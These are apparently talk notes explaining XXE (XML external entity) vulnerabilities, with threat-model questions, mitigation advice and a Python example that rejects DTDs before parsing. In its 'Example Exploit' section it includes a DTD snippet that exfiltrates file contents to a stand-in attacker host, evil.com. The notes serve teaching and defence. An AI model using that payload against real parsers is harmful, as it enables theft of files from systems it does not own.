XXE For Dummies
XML eXternal Entities
Notes from the BSidesPDX talk by @brimy, which gives a great introduction to how XXE vulnerabilities work. Video posted
Added to the OWASP Top 10 in 2017
Entities
HTML entities are the usual entry point. A sequence such as &amp; is replaced with & only when the page is rendered: the entity is expanded at render time, which is what makes it a trigger.
XML also allows user-defined entities, declared in the DTD and then referenced by name:
<!ENTITY xml "Extensible Markup Language">
&xml;
External Entities
<!ENTITY chapter1 SYSTEM "chapter1.txt">
When the parser reaches a reference to this entity it resolves the SYSTEM identifier, reads the contents of chapter1.txt and substitutes them into the document.
Because that resolution happens at parse time, anyone who controls the XML can make the parser read files or URLs it can reach and return the data, including sensitive data, in the output.
Example Exploit
The attacker hosts evil.dtd on evil.com. When the victim's parser loads that DTD, the declarations below make it request http://evil.com/evil.html?payload=... with the captured data appended to the URL (the parameter entity %file; holds the data to be sent and is declared earlier in the DTD):
<!ENTITY % all
"<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>"
>
%all;
Threat Model Questions to Ask
- Does your parser accept a DTD at all? .NET is one of the primary sources of exposure: in .NET < 4.5.2 the default parser settings are vulnerable.
- Do you allow external entities? (You shouldn't.)
- Do you validate untrusted input? (You always should.)
DO: update parsers, disable DTD processing and external entities, validate input, and where DTDs are genuinely needed set explicit policies for resolving URLs.
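As an added example (not from the talk), here is the "disable DTD" advice enforced with Python's standard library alone: the document is pre-scanned with a bare expat parser that aborts on the first DOCTYPE, so no entity from this page's examples can be expanded or fetched. The sample documents are constructed from the declarations above.

```python
"""Added example (not from the talk): enforce "disable DTD" with the stdlib.

Python's xml.etree cannot be told to refuse DTDs, so the document is first
scanned with a bare expat parser that aborts on the first DOCTYPE, before
any entity could be expanded or fetched. Inputs below are constructed.
"""
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DtdRejected(ValueError):
    """The document carries a DOCTYPE (internal or external subset)."""


def reject_dtd(data: bytes) -> None:
    """Abort on any DOCTYPE. No ExternalEntityRefHandler is installed, so
    this pre-scan never resolves SYSTEM identifiers itself."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdRejected(f"DTD not allowed (DOCTYPE {name!r}, SYSTEM {system_id!r})")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def safe_parse(data: bytes) -> ET.Element:
    """Parse only documents that carry no DTD."""
    reject_dtd(data)
    return ET.fromstring(data)


def check(data: bytes) -> str:
    """Summarise the outcome as a string so results are easy to compare."""
    try:
        return "parsed:" + safe_parse(data).tag
    except DtdRejected as exc:
        return "rejected:" + str(exc)


def unguarded_text(data: bytes) -> str:
    """What the plain parser yields: internal entities ARE expanded."""
    return ET.fromstring(data).text


# Constructed inputs echoing the declarations discussed on this page.
CLEAN_DOC = b"<doc><title>XXE For Dummies</title></doc>"
INTERNAL_ENTITY_DOC = (b'<!DOCTYPE doc [<!ENTITY xml "Extensible Markup Language">]>'
                       b"<doc>&xml;</doc>")
EXTERNAL_ENTITY_DOC = (b'<!DOCTYPE doc [<!ENTITY chapter1 SYSTEM "chapter1.txt">]>'
                       b"<doc>&chapter1;</doc>")

if __name__ == "__main__":
    for doc in (CLEAN_DOC, INTERNAL_ENTITY_DOC, EXTERNAL_ENTITY_DOC):
        print(check(doc))
    print(unguarded_text(INTERNAL_ENTITY_DOC))
```

The unguarded call shows why the pre-scan matters: the stock parser happily expands the internal entity, and it is only the DOCTYPE check that keeps the external one from ever being considered.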